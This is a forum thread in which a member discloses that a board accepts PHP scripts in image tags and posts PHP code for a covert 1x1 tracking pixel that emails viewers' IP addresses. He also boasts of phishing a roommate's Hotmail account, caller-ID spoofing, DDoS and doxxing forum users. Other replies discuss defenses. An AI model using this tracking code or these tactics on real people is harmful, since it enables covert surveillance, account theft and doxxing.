Board Exploit!

[HarryChiling]

I was workign on a project a while back where I was createing an image using PHP, well I posted it here on this board with an image tag and low and behold the extension .php was accepted in an image tag. Then I got to thinking what if I was to create and image hosted on my server that woud capture an ip address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (of course further exploits would have to be utilized sniff sniff) anyway then I got to thinking how would I target my tool more precisely? Well then it rang a bell, if I sent this image to one person only in a PM then I could potentially grab ip adresses from targeted people.

Is their anyway of turning off .php extensions in the image tags?

[DragonLensmanWV]

I was workign on a project a while back where I was createing an image using PHP, well I posted it here on this board with an image tag and low and behold the extension .php was accepted in an image tag. Then I got to thinking what if I was to create and image hosted on my server that woud capture an ip address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (of course further exploits would have to be utilized sniff sniff) anyway then I got to thinking how would I target my tool more precisely? Well then it rang a bell, if I sent this image to one person only in a PM then I could potentially grab ip adresses from targeted people.

Is their anyway of turning off .php extensions in the image tags?

Did you ever read the one about where this n00b hacker was in an online forum threatening to destroy the other guy's computers? He was boastin that he had all the latest hacker toolz and was taunting the guys to reveal their IP addresses so he could format their drives. One guy gave him "his" IP address of 127.0.0.1. Then the hacker gleefully launched his attack - "there goes your drive E:, there goes your drive D: there goes your drive C:......user offline"
I just about busted a gut! The next day the guy came back. "I don't know what you guys did, but my computer crashed and I got i back online so here I go again!" "There goes your E: drive, ....." In the words of Red Foreman, "DUMBASS!"

[HarryChiling]

Did you ever read the one about where this n00b hacker was in an online forum threatening to destroy the other guy's computers? He was boastin that he had all the latest hacker toolz and was taunting the guys to reveal their IP addresses so he could format their drives. One guy gave him "his" IP address of 127.0.0.1. Then the hacker gleefully launched his attack - "there goes your drive E:, there goes your drive D: there goes your drive C:......user offline"
I just about busted a gut! The next day the guy came back. "I don't know what you guys did, but my computer crashed and I got i back online so here I go again!" "There goes your E: drive, ....." In the words of Red Foreman, "DUMBASS!"

No never heard that one, but back in the earlier days of Yahoo's instant messenger the program had a vulnerability with the buffer so you could send a string of special charaters which count as many more that are displayed and if you sent enough of them the program crashed and after a while the dreaded blue screen. I had made a few programs that exploited this and used to just throw people out of chat rooms all the time. I hd participated in a few DDOS Attacks before and used to belong to Black Code before they closed down about three years ago. I focused more on cracking than hacking. I still have a few pieces of software that I cracked and provided patches for. One of them actually went outta business even though they had a great piece of software which I still use. I was younger then and more naive, now I see the error in my ways and still at times see flaws in code but I am more interested in correctign them than exploiting them.

The funniest story of a hack I did was a cobination hack/phishing scam, my wifes room mate in college had a hotmail account and at one point through hotmail you could run javascript commands if you were to use the character codes for one of the letters in the javascript statement which microsoft wasn't hip to, so I made a exact copy of the microsoft passport login on my servers that collected and e-mailed me the data and then used a popup window to display the fake promt to her accoutn in an e-mail. She opened it and thought she was logging into her account but the pop up just went away and she assumed all was well. Anyway the reason I did this was that she was constantly bugging my wife and it was finals so I changed all er passwords and the security question to her accoutn along with the address and phone number she signd up with. You should have seen her for a week she was ont he phoe with microsoft swearign that it was really her account. Anyway after finals I gave her the password and told her to never trust a popup like that again. She was issed at me, but ultimately he wanted me to do it to everyone she knew that had a hotmail account.

Another great exploit was the caller id exploit on t-mobile and other cellular networks you could setup a linux asterisk server to act as a phone company in essence and send fake caller id software well at one point I hd old computer set up to do this and would call my buddies up on their cell phones using their cell phone number in the caller id field and whalla I would automatically be in their voice mail, I would leave messages on their phone in the outgoing message so that when other people called their phone they would hear my voicemail message to them, I had two of my buddies convinced that their phones were busted, it was hilarious. This scheme is also being used now by skimmers who would take and sign up for credit cards and then activate them to your home by sending spoofed caller id data to the activation line, most of the credit card companies wouldn't even blink an eye to the address chaneg if the phone number remained the same.

[Leo Hadley Jr]

Wow, nice to see an old school hacker:finger:
Maybe that explains all your reputation points .......lol

[xiaowei]

I was workign on a project a while back where I was createing an image using PHP, well I posted it here on this board with an image tag and low and behold the extension .php was accepted in an image tag. Then I got to thinking what if I was to create and image hosted on my server that woud capture an ip address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (of course further exploits would have to be utilized sniff sniff) anyway then I got to thinking how would I target my tool more precisely? Well then it rang a bell, if I sent this image to one person only in a PM then I could potentially grab ip adresses from targeted people.

Is their anyway of turning off .php extensions in the image tags?

If you have full control of your server, you don´t need any special script to capture IP adresses, almost any WWW server will log who accessed the files it serves (and when etc.) and hence reveal the IP adress of the client resp. at least it masqueraded adress (if it is via a masquerading router as with most cases of local networks today).

"Grabbing" IP adresses via personal mail that contains images has been used for a while, especially for spam mail. This is not so much because it is a security hole (it´s not if the computer is configured reasonably, without giving the IP adress at least to the resp. server, no data could ever be sent back!!) but it can be conveniently used as a "reading confirmation".

To do this, the URL of the image in the personal mail is combined with a unique ID that is different for every mail adress sent to. So the spammer can distinguish spam that reached their target and was even viewed at once from other targets that were the spam was lost and "optimize" further spamming.

Therefore, most new mail clients will not automatically display images embedded in incoming mail, if not from known "good" senders.

[HarryChiling]

If you have full control of your server, you don´t need any special script to capture IP adresses, almost any WWW server will log who accessed the files it serves (and when etc.) and hence reveal the IP adress of the client resp. at least it masqueraded adress (if it is via a masquerading router as with most cases of local networks today).

"Grabbing" IP adresses via personal mail that contains images has been used for a while, especially for spam mail. This is not so much because it is a security hole (it´s not if the computer is configured reasonably, without giving the IP adress at least to the resp. server, no data could ever be sent back!!) but it can be conveniently used as a "reading confirmation".

To do this, the URL of the image in the personal mail is combined with a unique ID that is different for every mail adress sent to. So the spammer can distinguish spam that reached their target and was even viewed at once from other targets that were the spam was lost and "optimize" further spamming.

Therefore, most new mail clients will not automatically display images embedded in incoming mail, if not from known "good" senders.

Very ture however by way of the PM system certain individuals can be targeted and the information could be used along with clues in the persons posts to find out their place of employment and addresses. I just thought I would bring it up. I have been using it for years on boards and often times people here have been amazed that I can come up with so much info about them so quickly and this is how.

[migsopt]

Did you ever read the one about where this n00b hacker was in an online forum threatening to destroy the other guy's computers? He was boastin that he had all the latest hacker toolz and was taunting the guys to reveal their IP addresses so he could format their drives. One guy gave him "his" IP address of 127.0.0.1. Then the hacker gleefully launched his attack - "there goes your drive E:, there goes your drive D: there goes your drive C:......user offline"
I just about busted a gut! The next day the guy came back. "I don't know what you guys did, but my computer crashed and I got i back online so here I go again!" "There goes your E: drive, ....." In the words of Red Foreman, "DUMBASS!"

That is hilarious. Must have been a very noob hacker not to know that 127.0.0.1 is the local machine. Thanks for the chuckle

[HarryChiling]

That is hilarious. Must have been a very noob hacker not to know that 127.0.0.1 is the local machine. Thanks for the chuckle

Another funny thing to do with the local machine is to set your host file so that certain frequently visited sites point back to the local machine. I did that in the office when one employee was spending all her time on the computer, I took and pointed the host files in the office to 127.0.0.1 for all the sites she frequented and amazingly she up quit in a few months.

[Steve Machol]

I was workign on a project a while back where I was createing an image using PHP, well I posted it here on this board with an image tag and low and behold the extension .php was accepted in an image tag. Then I got to thinking what if I was to create and image hosted on my server that woud capture an ip address and save it to a database? Then anyone that looked at my picture would be unknowingly allowing me direct access to their computer. (of course further exploits would have to be utilized sniff sniff) anyway then I got to thinking how would I target my tool more precisely? Well then it rang a bell, if I sent this image to one person only in a PM then I could potentially grab ip adresses from targeted people.

Is their anyway of turning off .php extensions in the image tags?

Unless Im missing something I honestly don't see how that is any different than someone posting a link to a site with malicious code. In the end, the defense against such things is strong firewall and trojan/virus protection on your PC.

[HarryChiling]

Unless Im missing something I honestly don't see how that is any different than someone posting a link to a site with malicious code. In the end, the defense against such things is strong firewall and trojan/virus protection on your PC.

True. The image would show up thought without any user intervention unless they choose to turn off images to make loading the forum faster. Just something I thought I'd mention to the powers that be.

example:

PHP Code:

<?
// Define .PNG image
header("Content-type: image/png");
 
// Make the demension so samll it's inconspicuos
$imgWidth=1;
$imgHeight=1;
 
// Create image
$image=imagecreate($imgWidth, $imgHeight);
 
// Get the persons IP Address and Host Name
$ip=$_SERVER['REMOTE_ADDR']; 
$hs=$_SERVER['REMOTE_HOST'];
 
// Simple mail script to send an e-mail with IP Address to me
$to = "EMAIL@EMAIL.COM";
$subject = "SUBJECT OF EMAIL";
$body = "IP Address: $ip \nHost Name: $hs";
mail($to, $subject, $body);
 
// Output image from memory
imagepng($image);
 
// Free resources on server
imagedestroy($image);
?>

The image would only be 1 x 1 pixel and most people wouldn't be able to tell, if it was on my server of course I could host any malicious content I wanted I thought there might be a way of screening the content that gets posted in in the images tags so that it would block this kind of image.

Code:

[img]......[/img]

[allanon]

Ahhh the memories!

[sharpstick777]

Is their anyway of turning off .php extensions in the image tags?

This can be done at the server level by recompiling Apache/PHP with Secure PHP features. Any basic level sever admin should be able to accomplish it.

1) use the lastest version of Apache and PHP
2) use the lastest version of the software
3) use secure php settings when recompiling Apache

most exploits take advantage of older software.

Sharpstick

[Steve Machol]

SecurePHP breaks a lot of other things that are needed to run this forum.

[allanon]

SecurePHP breaks a lot of other things that are needed to run this forum.

I think he meant to use best practices regarding the PHP configs, not necessarily the SecurePHP variant.

-Brian